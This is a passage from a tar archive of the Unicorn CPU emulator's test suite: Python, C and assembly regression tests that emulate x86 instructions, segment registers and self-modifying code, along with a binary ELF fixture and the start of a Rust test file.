uc.reg_write(UC_X86_REG_RAX, orax) uc.reg_write(UC_X86_REG_RDX, ordx) uc.reg_write(UC_X86_REG_RCX, orcx) uc.reg_write(UC_X86_REG_RIP, orip) def get_msr(uc, msr, scratch=SCRATCH_ADDR): ''' fetch the contents of the given model-specific register (MSR). this will clobber some memory at the given scratch address, as it emits some code. ''' # save clobbered registers orax = uc.reg_read(UC_X86_REG_RAX) ordx = uc.reg_read(UC_X86_REG_RDX) orcx = uc.reg_read(UC_X86_REG_RCX) orip = uc.reg_read(UC_X86_REG_RIP) # x86: rdmsr buf = '\x0f\x32' uc.mem_write(scratch, buf) uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF) uc.emu_start(scratch, scratch+len(buf), count=1) eax = uc.reg_read(UC_X86_REG_EAX) edx = uc.reg_read(UC_X86_REG_EDX) # restore clobbered registers uc.reg_write(UC_X86_REG_RAX, orax) uc.reg_write(UC_X86_REG_RDX, ordx) uc.reg_write(UC_X86_REG_RCX, orcx) uc.reg_write(UC_X86_REG_RIP, orip) return (edx << 32) | (eax & 0xFFFFFFFF) def set_gs(uc, addr): ''' set the GS.base hidden descriptor-register field to the given address. this enables referencing the gs segment on x86-64. ''' return set_msr(uc, GSMSR, addr) def get_gs(uc): ''' fetch the GS.base hidden descriptor-register field. ''' return get_msr(uc, GSMSR) def set_fs(uc, addr): ''' set the FS.base hidden descriptor-register field to the given address. this enables referencing the fs segment on x86-64. ''' return set_msr(uc, FSMSR, addr) def get_fs(uc): ''' fetch the FS.base hidden descriptor-register field. ''' return get_msr(uc, FSMSR) class TestGetSetMSR(regress.RegressTest): def test_msr(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) set_msr(uc, FSMSR, 0x1000) self.assertEqual(0x1000, get_msr(uc, FSMSR)) set_msr(uc, GSMSR, 0x2000) self.assertEqual(0x2000, get_msr(uc, GSMSR)) def test_gs(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) uc.mem_map(CODE_ADDR, CODE_SIZE) uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) code = '6548330C2518000000'.decode('hex') # x86-64: xor rcx, qword ptr gs:[0x18] uc.mem_write(CODE_ADDR, code) uc.mem_write(SEGMENT_ADDR+0x18, 'AAAAAAAA') set_gs(uc, SEGMENT_ADDR) self.assertEqual(SEGMENT_ADDR, get_gs(uc)) uc.emu_start(CODE_ADDR, CODE_ADDR+len(code)) self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141) def test_fs(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) uc.mem_map(CODE_ADDR, CODE_SIZE) uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) code = '6448330C2518000000'.decode('hex') # x86-64: xor rcx, qword ptr fs:[0x18] uc.mem_write(CODE_ADDR, code) uc.mem_write(SEGMENT_ADDR+0x18, 'AAAAAAAA') set_fs(uc, SEGMENT_ADDR) self.assertEqual(SEGMENT_ADDR, get_fs(uc)) uc.emu_start(CODE_ADDR, CODE_ADDR+len(code)) self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_eflags.py�����������������������������������������������������������0000775�0000000�0000000�00000002040�14675241067�0020337�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python import regress import unicorn as U class WrongEFLAGS2(regress.RegressTest): def test_eflags(self): # imul eax, ebx CODE = '\x0f\xaf\xc3' uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_32) uc.reg_write(U.x86_const.UC_X86_REG_EAX, 16) uc.reg_write(U.x86_const.UC_X86_REG_EBX, 1) uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x292) uc.mem_map(0x600000, 0x1000) uc.mem_write(0x6000b0, CODE) uc.emu_start(0x6000b0, 0, count=1) # Here's the original execution trace for this on actual hardware. # # (gdb) x/i $eip # => 0x804aae5: imul eax,DWORD PTR [ebp-0x8] # (gdb) p/x $eax # $2 = 0x10 # (gdb) x/wx $ebp-8 # 0xbaaaad4c: 0x00000001 # (gdb) p/x $eflags # $3 = 0x292 # (gdb) si # 0x0804aae9 in ?? () # (gdb) p/x $eflags # $4 = 0x202 self.assertEqual(0x202, uc.reg_read(U.x86_const.UC_X86_REG_EFLAGS)) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_fldt_fsqrt.py�������������������������������������������������������0000775�0000000�0000000�00000001301�14675241067�0021245�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from unicorn import * from unicorn.x86_const import * from struct import pack import regress CODE_ADDR = 0x1000000 CODE = ( '\xb8\x00\x00\x00\x02' # mov eax, 0x2000000 '\xdb\x28' # fldt [eax] '\xd9\xfa' # fsqrt ) DATA_ADDR = 0x2000000 DATA = '\0\0\0\0\0\0\0\0\0\1' class FldtFsqrt(regress.RegressTest): def test_fldt_fsqrt(self): uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.mem_map(CODE_ADDR, 0x1000) uc.mem_write(CODE_ADDR, CODE) uc.mem_map(DATA_ADDR, 0x1000) uc.mem_write(DATA_ADDR, DATA) uc.emu_start(CODE_ADDR, CODE_ADDR + len(CODE), 10000, 10) if __name__ == '__main__': regress.main() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_gdt.py��������������������������������������������������������������0000775�0000000�0000000�00000004036�14675241067�0017663�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from unicorn import * from unicorn.x86_const import * from struct import pack import regress F_GRANULARITY = 0x8 F_PROT_32 = 0x4 F_LONG = 0x2 F_AVAILABLE = 0x1 A_PRESENT = 0x80 A_PRIV_3 = 0x60 A_PRIV_2 = 0x40 A_PRIV_1 = 0x20 A_PRIV_0 = 0x0 A_CODE = 0x10 A_DATA = 0x10 A_TSS = 0x0 A_GATE = 0x0 A_DATA_WRITABLE = 0x2 A_CODE_READABLE = 0x2 A_DIR_CON_BIT = 0x4 S_GDT = 0x0 S_LDT = 0x4 S_PRIV_3 = 0x3 S_PRIV_2 = 0x2 S_PRIV_1 = 0x1 S_PRIV_0 = 0x0 CODE = '65330d18000000'.decode('hex') # xor ecx, dword ptr gs:[0x18] def create_selector(idx, flags): to_ret = flags to_ret |= idx << 3 return to_ret def create_gdt_entry(base, limit, access, flags): to_ret = limit & 0xffff; to_ret |= (base & 0xffffff) << 16; to_ret |= (access & 0xff) << 40; to_ret |= ((limit >> 16) & 0xf) << 48; to_ret |= (flags & 0xff) << 52; to_ret |= ((base >> 24) & 0xff) << 56; return pack('<Q',to_ret) def hook_mem_read(uc, type, addr,*args): print(hex(addr)) return False CODE_ADDR = 0x40000 CODE_SIZE = 0x1000 GDT_ADDR = 0x3000 GDT_LIMIT = 0x1000 GDT_ENTRY_SIZE = 0x8 SEGMENT_ADDR = 0x5000 SEGMENT_SIZE = 0x1000 class GdtRead(regress.RegressTest): def test_gdt(self): uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.hook_add(UC_HOOK_MEM_READ_UNMAPPED, hook_mem_read) uc.mem_map(GDT_ADDR, GDT_LIMIT) uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) uc.mem_map(CODE_ADDR, CODE_SIZE) uc.mem_write(CODE_ADDR, CODE) uc.mem_write(SEGMENT_ADDR+0x18, 'AAAA') gdt_entry = create_gdt_entry(SEGMENT_ADDR, SEGMENT_SIZE, A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) uc.mem_write(GDT_ADDR + 8, gdt_entry) uc.reg_write(UC_X86_REG_GDTR, (0, GDT_ADDR, GDT_LIMIT, 0x0)) selector = create_selector(1, S_GDT | S_PRIV_3) uc.reg_write(UC_X86_REG_GS, selector) uc.emu_start(CODE_ADDR, CODE_ADDR+len(CODE)) self.assertEqual(uc.reg_read(UC_X86_REG_ECX), 0x41414141) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_ld_crash.py���������������������������������������������������������0000775�0000000�0000000�00000014723�14675241067�0020670�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.x86_const import * from capstone import * # extract from ld.so shellcode = [0x55, 0x89, 0xE5, 0x57, 0x56, 0x53, 0xE8, 0xE0, 0x9F, 0x01, 0x00, 0x81, 0xC3, 0xF5, 0x57, 0x02, 0x00, 0x83, 0xEC, 0x3C, 0x0F, 0x31, 0x89, 0x93, 0xE4, 0xF8, 0xFF, 0xFF, 0x8D, 0x93, 0x34, 0xFF, 0xFF, 0xFF, 0x89, 0x83, 0xE0, 0xF8, 0xFF, 0xFF, 0x8B, 0x83, 0x34, 0xFF, 0xFF, 0xFF, 0x89, 0xD6, 0x2B, 0xB3, 0x00, 0x00, 0x00, 0x00, 0x89, 0x93, 0x60, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x89, 0xB3, 0x58, 0x05, 0x00, 0x00, 0x74, 0x5A, 0xBF, 0xFF, 0xFF, 0xFF, 0x6F, 0xEB, 0x1C, 0x8D, 0x76, 0x00, 0xB9, 0x21, 0x00, 0x00, 0x70, 0x29, 0xC1, 0x89, 0xC8, 0x89, 0x94, 0x83, 0x78, 0x05, 0x00, 0x00, 0x83, 0xC2, 0x08, 0x8B, 0x02, 0x85, 0xC0, 0x74, 0x37, 0x83, 0xF8, 0x21, 0x76, 0xEB, 0x89, 0xF9, 0x29, 0xC1, 0x83, 0xF9, 0x0F, 0x76, 0xD9, 0x8D, 0x0C, 0x00, 0xD1, 0xF9, 0x83, 0xF9, 0xFC, 0x0F, 0x86, 0xDB, 0x02, 0x00, 0x00, 0xF7, 0xD1, 0x89, 0x94, 0x8B, 0x40, 0x06, 0x00, 0x00, 0x83, 0xC2, 0x08, 0x8B, 0x02, 0x85, 0xC0, 0x75, 0xD2, 0x89, 0xF6, 0x8D, 0xBC, 0x27, 0x00, 0x00, 0x00, 0x00, 0x85, 0xF6, 0x74, 0x68, 0x8B, 0x83, 0x88, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0x84, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0x8C, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0x90, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0xBC, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0xD4, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0x3C, 0x06, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0xA4, 0x06, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x93, 0xC8, 0x05, 0x00, 0x00, 0x85, 0xD2, 0x74, 0x0A, 0x83, 0x7A, 0x04, 0x11, 0x0F, 0x85, 0x24, 0x04, 0x00, 0x00, 0x8B, 0x83, 0xBC, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x10, 0x8B, 0x8B, 0xC4, 0x05, 0x00, 0x00, 0x83, 0x79, 0x04, 0x08, 0x0F, 0x85, 0xEB, 0x03, 0x00, 0x00, 0x8B, 0x8B, 0x10, 0x06, 0x00, 0x00, 0x85, 0xC9, 0x74, 0x0D, 0xF7, 0x41, 0x04, 0xFE, 0xFF, 0xFF, 0xFF, 0x0F, 0x85, 0xB5, 0x03, 0x00, 0x00, 0x8B, 0x8B, 0xF0, 0x05, 0x00, 0x00, 0x85, 0xC9, 0x74, 0x0D, 0xF7, 0x41, 0x04, 0xF7, 0xFF, 0xFF, 0xFF, 0x0F, 0x85, 0x7F, 0x03, 0x00, 0x00, 0x8B, 0x8B, 0xEC, 0x05, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x85, 0x52, 0x03, 0x00, 0x00, 0x8B, 0xBB, 0xB4, 0x05, 0x00, 0x00, 0x85, 0xFF, 0x0F, 0x85, 0x25, 0x03, 0x00, 0x00, 0x85, 0xF6, 0x0F, 0x85, 0xA4, 0x00, 0x00, 0x00, 0x8B, 0x8B, 0x74, 0x06, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0x96, 0x00, 0x00, 0x00, 0x8D, 0xB3, 0x58, 0x05, 0x00, 0x00, 0x83, 0xEC, 0x0C, 0x80, 0x8B, 0xEC, 0x06, 0x00, 0x00, 0x04, 0x56, 0xE8, 0x00, 0x95, 0x00, 0x00, 0x8D, 0x83, 0x00, 0x90, 0xFD, 0xFF, 0x89, 0xB3, 0x6C, 0x05, 0x00, 0x00, 0x89, 0x83, 0x04, 0x07, 0x00, 0x00, 0x8D, 0x83, 0x38, 0x09, 0x00, 0x00, 0x89, 0x83, 0x08, 0x07, 0x00, 0x00, 0x8D, 0x83, 0xFB, 0x47, 0xFF, 0xFF, 0x89, 0x83, 0x0C, 0x07, 0x00, 0x00, 0x0F, 0x31, 0x89, 0x83, 0x40, 0x05, 0x00, 0x00, 0x89, 0x93, 0x44, 0x05, 0x00, 0x00, 0x58, 0x8D, 0x83, 0x30, 0xAE, 0xFD, 0xFF, 0x89, 0xAB, 0x2C, 0xFF, 0xFF, 0xFF, 0x5A, 0x50, 0xFF, 0x75, 0x08, 0xE8, 0x81, 0x61, 0x01, 0x00, 0x89, 0xC6, 0x0F, 0x31, 0x2B, 0x83, 0xE0, 0xF8, 0xFF, 0xFF, 0x1B, 0x93, 0xE4, 0xF8, 0xFF, 0xFF, 0x83, 0xC4, 0x10, 0xF6, 0x83, 0x00, 0xF9, 0xFF, 0xFF, 0x80, 0x89, 0x45, 0xE0, 0x89, 0x55, 0xE4, 0x0F, 0x85, 0x53, 0x02, 0x00, 0x00, 0x8D, 0x65, 0xF4, 0x89, 0xF0, 0x5B, 0x5E, 0x5F, 0x5D, 0xC3, 0x90, 0x85, 0xC0, 0x0F, 0x84, 0x18, 0x02, 0x00, 0x00, 0x8B, 0x48, 0x04, 0x8B, 0x83, 0xC0, 0x05, 0x00, 0x00, 0x8B, 0x78, 0x04, 0x8B, 0x83, 0x14, 0x06, 0x00, 0x00, 0x89, 0x4D, 0xC8, 0x89, 0x4D, 0xD4, 0x89, 0x45, 0xC4, 0x8B, 0x45, 0xC4, 0x89, 0x7D, 0xD0, 0x01, 0xCF, 0x89, 0x7D, 0xCC, 0x89, 0xCF, 0x85, 0xC0, 0x74, 0x06, 0x8B, 0x48, 0x04, 0x8D, 0x0C, 0xCF, 0x85, 0xD2, 0x74, 0x2E, 0x8B, 0x83, 0xD4, 0x05, 0x00, 0x00, 0x8B, 0x93, 0x80, 0x05, 0x00, 0x00, 0x8B, 0x78, 0x04, 0x8B, 0x52, 0x04, 0x8B, 0x45, 0xD0, 0x01, 0xD7, 0x29, 0xD0, 0x3B, 0x7D, 0xCC, 0x89, 0x45, 0xC4, 0x8B, 0x45, 0xD0, 0x0F, 0x44, 0x45, 0xC4, 0x03, 0x55, 0xC8, 0x01, 0xD0, 0x89, 0x45, 0xCC, 0x8B, 0x93, 0x90, 0x05, 0x00, 0x00, 0x39, 0x4D, 0xD4, 0x8B, 0x42, 0x04, 0x89, 0x45, 0xC8, 0x73, 0x32, 0x8B, 0x45, 0xD4, 0x89, 0xF2, 0x03, 0x10, 0x80, 0x78, 0x04, 0x08, 0x0F, 0x85, 0xCC, 0x01, 0x00, 0x00, 0x8B, 0x45, 0xD4, 0xEB, 0x13, 0x90, 0x8D, 0x74, 0x26, 0x00, 0x8B, 0x10, 0x01, 0xF2, 0x80, 0x78, 0x04, 0x08, 0x0F, 0x85, 0xB4, 0x01, 0x00, 0x00, 0x83, 0xC0, 0x08, 0x01, 0x32, 0x39, 0xC8, 0x72, 0xE9, 0x8B, 0xBB, 0x3C, 0x06, 0x00, 0x00, 0x85, 0xFF, 0x0F, 0x84, 0x73, 0x02, 0x00, 0x00, 0x8D, 0x05, 0x40, 0x00, 0x00, 0x00, 0x39, 0x4D, 0xCC, 0x89, 0x45, 0xD0, 0x8D, 0x83, 0xE0, 0xFB, 0xFE, 0xFF, 0x89, 0x45, 0xC0, 0x0F, 0x86, 0x92, 0xFE, 0xFF, 0xFF, 0x89, 0x75, 0xC4, 0x90, 0x8D, 0x74, 0x26, 0x00, 0x8B, 0x7D, 0xC4, 0x03, 0x39, 0x8B, 0x41, 0x04, 0x8B, 0x55, 0xD0, 0x89, 0x7D, 0xD4, 0x89, 0xC7, 0x0F, 0xB6, 0xF0, 0xC1, 0xEF, 0x08, 0xC1, 0xE7, 0x04, 0x03, 0x7D, 0xC8, 0x8B, 0x47, 0x04, 0x03, 0x84, 0x1A, 0x18, 0x05, 0x00, 0x00, 0x0F, 0xB6, 0x57, 0x0C, 0x83, 0xE2, 0x0F, 0x80, 0xFA, 0x0A, 0x0F, 0x84, 0xEA, 0x00, 0x00, 0x00, 0x83, 0xEE, 0x06, 0x83, 0xFE, 0x23, 0x77, 0x4A, 0x8B, 0x94, 0xB3, 0x00, 0x48, 0xFF, 0xFF, 0x01, 0xDA, 0xFF, 0xE2, 0x8D, 0xB4, 0x26, 0x00, 0x00, 0x00, 0x00, 0xB9, 0xFF, 0xFD, 0xFF, 0x6F, 0x29, 0xC1, 0x83, 0xF9, 0x0B, 0x0F, 0x87, 0xA0, 0x00, 0x00, 0x00, 0xF7, 0xD8, 0x89, 0x94, 0x83, 0x48, 0xFE, 0xFF, 0xBF, 0xE9, 0xE2, 0xFC, 0xFF, 0xFF, 0x66, 0x90, 0x8B, 0x45, 0xD0, 0x8B, 0x75, 0xD4, 0x8B, 0x84, 0x18, 0x58, 0x07, 0x00, 0x00, 0x03, 0x06, 0x2B, 0x47, 0x04, 0x89, 0x06, 0x8D, 0x74, 0x26, 0x00, 0x83, 0xC1, 0x08, 0x39, 0x4D, 0xCC, 0x0F, 0x87, 0x6C, 0xFF, 0xFF, 0xFF, 0xE9, 0xF1, 0xFD, 0xFF, 0xFF, 0x8D, 0xB4, 0x26, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x75, 0xD4, 0x8B, 0x46, 0x04, 0x03, 0x47, 0x04, 0x8B, 0x7D, 0xD0, 0x2B, 0x84, 0x1F, 0x58, 0x07, 0x00, 0x00, 0x89, 0x46, 0x04, 0x8B, 0x45, 0xC0, 0x89, 0x06, 0xEB, 0xCB, 0x8D, 0x76, 0x00, 0x8B, 0x7D, 0xD4, 0x89, 0x07, 0xEB, 0xC1, 0x89, 0xF6, 0x8D, 0xBC, 0x27, 0x00, 0x00, 0x00, 0x00] baseaddr = 0x47bb800 crash_point = 0x47bba6e # mov eax, [ebx + 0x5d4] uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.mem_map(baseaddr - baseaddr%0x1000, 0x4000) # code uc.mem_map(0x8000, 0x1000) # stack uc.mem_map(0x1000, 0x1000) # [ebx + 0x5d4] uc.mem_write(0x1000 + 0x5d4, b"\xff\xff\xff\xff") uc.mem_write(baseaddr, bytes(shellcode)) uc.reg_write(UC_X86_REG_EIP, crash_point) uc.reg_write(UC_X86_REG_ESP, 0x90000) uc.reg_write(UC_X86_REG_EBX, 0x1000) uc.emu_start(begin=crash_point, until=0, count=2) print(f"eax={bytes(uc.mem_read(0x1000+ 0x5d4, 4))}")���������������������������������������������unicorn-2.1.1/tests/regress/x86_self_modifying.elf��������������������������������������������������0000775�0000000�0000000�00000001320�14675241067�0022212�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ELF��������������t4���������4� ��(������������������������Qtd���������������������������@��5-������-1Ҹ���̀�t IC����^N 1҃t-���B-E�����������������������t������������������ ��������������������0��������������������+���ڀ�������$���t������5���ڐ������A���ڐ������0���ܐ�������stuff.o�self_modifying�memcpy�_loop_start�_loop_end�__bss_start�_edata��.symtab�.strtab�.shstrtab�.text�����������������������������������������������������tt���f����������������������������������!�������������������������������������������������� ����������������H����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_self_modifying.py���������������������������������������������������0000775�0000000�0000000�00000002072�14675241067�0022101�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from unicorn import * from unicorn.x86_const import * from struct import pack import os import regress # The file we're loading is a full assembled ELF. # Source for it, along with assembly instructions, are in x86_self_modifying.s CODE_ADDR = 0x08048000 STACK_ADDR = 0x2000000 CODE = open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'x86_self_modifying.elf')).read() CODE_SIZE = len(CODE) + (0x1000 - len(CODE)%0x1000) STACK_SIZE = 0x8000 ENTRY_POINT = 0x8048074 def hook_intr(uc, intno, data): uc.emu_stop() class SelfModifying(regress.RegressTest): def test_self_modifying(self): uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.mem_map(CODE_ADDR, CODE_SIZE, 5) uc.mem_map(STACK_ADDR, STACK_SIZE, 7) uc.mem_write(CODE_ADDR, CODE) uc.reg_write(UC_X86_REG_ESP, STACK_ADDR + STACK_SIZE) uc.hook_add(UC_HOOK_INTR, hook_intr) uc.emu_start(ENTRY_POINT, -1) retcode = uc.reg_read(UC_X86_REG_EBX) self.assertEqual(retcode, 65) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_self_modifying.s����������������������������������������������������0000664�0000000�0000000�00000002211�14675241067�0021703�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Assembly instructions (tested on ubuntu 16.04 x86_64): # $ as --32 x86_self_modifying.s -o x86_self_modifying.o # $ ld -melf_i386 -z execstack x86_self_modifying.o -o x86_self_modifying.elf # Test that it works. return code should be 65 # $ ./x86_self_modifying.elf # $ echo $? # 65 # Fix the entry point address in x86_self_modifying.py # $ readelf -h x86_self_modifying.elf | grep Entry # Entry point address: 0x8048074 .intel_syntax noprefix .global _start _start: mov ebp, esp sub ebp, 0x4000 mov edx, ebp lea esi, [self_modifying] mov edi, ebp mov ecx, 0x2d call memcpy add ebp, 0x2d xor ebx, ebx call edx mov eax, 1 int 0x80 memcpy: cmp ecx, 0 je _end dec ecx mov al, byte ptr [esi+ecx] mov byte ptr [edi+ecx], al jmp memcpy _end: ret self_modifying: inc ebx call $+5 pop esi dec byte ptr [esi+11] xor edx, edx sub esi, 6 _loop_start: cmp edx, 5 jz _loop_end mov edi, ebp mov ecx, 0x2d lea eax, [memcpy] call eax inc edx add ebp, 0x2d mov byte ptr [ebp], 0xc3 jmp _loop_start _loop_end: ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_set_ip.py�����������������������������������������������������������0000664�0000000�0000000�00000000722�14675241067�0020363�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.x86_const import * count = 0 def cb(uc, addr, sz, data): global count count += 1 print(f"addr: {hex(addr)} count: {count}") if count == 5: uc.emu_stop() else: uc.reg_write(UC_X86_REG_RIP, 0x2000) mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0x1000, 0x4000) mu.mem_write(0x1000, b"\x90" * 5) mu.mem_write(0x2000, b"\x90" * 5) mu.hook_add(UC_HOOK_CODE, cb) mu.emu_start(0x1000, 0x2000+1, 0, 0) ����������������������������������������������unicorn-2.1.1/tests/regress/x86_vex.c���������������������������������������������������������������0000664�0000000�0000000�00000005033�14675241067�0017474�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn/unicorn.h" #include <assert.h> #include <stdio.h> #define OK(x) {uc_err __err; if ((__err = x)) { fprintf(stderr, "%s", uc_strerror(__err)); assert(false); } } static void test_vmovdqu(void) { uc_engine *uc; int r_esi = 0x1234; int r_edi = 0x7890; uint64_t r_xmm0[2] = {0x08090a0b0c0d0e0f, 0x0001020304050607}; /* 128 bit at address esi (0x1234) this should not be read into xmm0 */ char mem_esi[] = { '\xE7', '\x1D', '\xA7', '\xE8', '\x88', '\xE4', '\x94', '\x40', '\x54', '\x74', '\x24', '\x97', '\x1F', '\x2E', '\xB6', '\x40' }; /* 128 bit at address edi (0x7890) this SHOULD be read into xmm0 */ char mem_edi[] = { '\xAD', '\xFA', '\x5C', '\x6D', '\x45', '\x4A', '\x93', '\x40', '\xD2', '\x00', '\xDE', '\x02', '\x89', '\xE8', '\x94', '\x40' }; /* vmovdqu xmm0, [edi] */ char code[] = { '\xC5', '\xFA', '\x6F', '\x07' }; /* initialize memory and run emulation */ OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, 0, 2 * 1024 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); // initialize machine registers; OK(uc_reg_write(uc, UC_X86_REG_XMM0, &r_xmm0)); OK(uc_reg_write(uc, UC_X86_REG_ESI, &r_esi)); OK(uc_reg_write(uc, UC_X86_REG_EDI, &r_edi)); OK(uc_mem_write(uc, r_esi, mem_esi, sizeof(mem_esi) / sizeof(mem_esi[0]))); OK(uc_mem_write(uc, r_edi, mem_edi, sizeof(mem_edi) / sizeof(mem_edi[0]))); OK(uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0)); /* Read xmm0 after emulation */ OK(uc_reg_read(uc, UC_X86_REG_XMM0, &r_xmm0)); assert(0x4094e88902de00d2 == r_xmm0[0] && 0x40934a456d5cfaad == r_xmm0[1]); OK(uc_close(uc)); } /* https://github.com/unicorn-engine/unicorn/issues/1656 */ static void test_vex_l(void) { uc_engine *uc; uc_err err; /* vmovdqu ymm1, [rcx] */ char code[] = { '\xC5', '\xFE', '\x6F', '\x09' }; /* initialize memory and run emulation */ OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0, 2 * 1024 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); err = uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0); if(err != UC_ERR_INSN_INVALID) { fprintf(stderr, "%s", uc_strerror(err)); assert(false); } OK(uc_close(uc)); } /* TODO: Add more vex prefixed instructions Suggestions: vxorpd, vxorps, vandpd, ... */ int main(int argc, char **argv, char **envp) { test_vmovdqu(); test_vex_l(); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/rust-tests/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016503�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/rust-tests/main.rs��������������������������������������������������������������0000664�0000000�0000000�00000061647�14675241067�0020013�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������extern crate alloc; use alloc::rc::Rc; use core::cell::RefCell; use unicorn_engine::unicorn_const::{ uc_error, Arch, HookType, MemType, Mode, Permission, SECOND_SCALE, TlbEntry, TlbType }; use unicorn_engine::{InsnSysX86, RegisterARM, RegisterMIPS, RegisterPPC, RegisterX86, Unicorn}; pub static X86_REGISTERS: [RegisterX86; 125] = [ RegisterX86::AH, RegisterX86::AL, RegisterX86::AX, RegisterX86::BH, RegisterX86::BL, RegisterX86::BP, RegisterX86::BPL, RegisterX86::BX, RegisterX86::CH, RegisterX86::CL, RegisterX86::CS, RegisterX86::CX, RegisterX86::DH, RegisterX86::DI, RegisterX86::DIL, RegisterX86::DL, RegisterX86::DS, RegisterX86::DX, RegisterX86::EAX, RegisterX86::EBP, RegisterX86::EBX, RegisterX86::ECX, RegisterX86::EDI, RegisterX86::EDX, RegisterX86::EFLAGS, 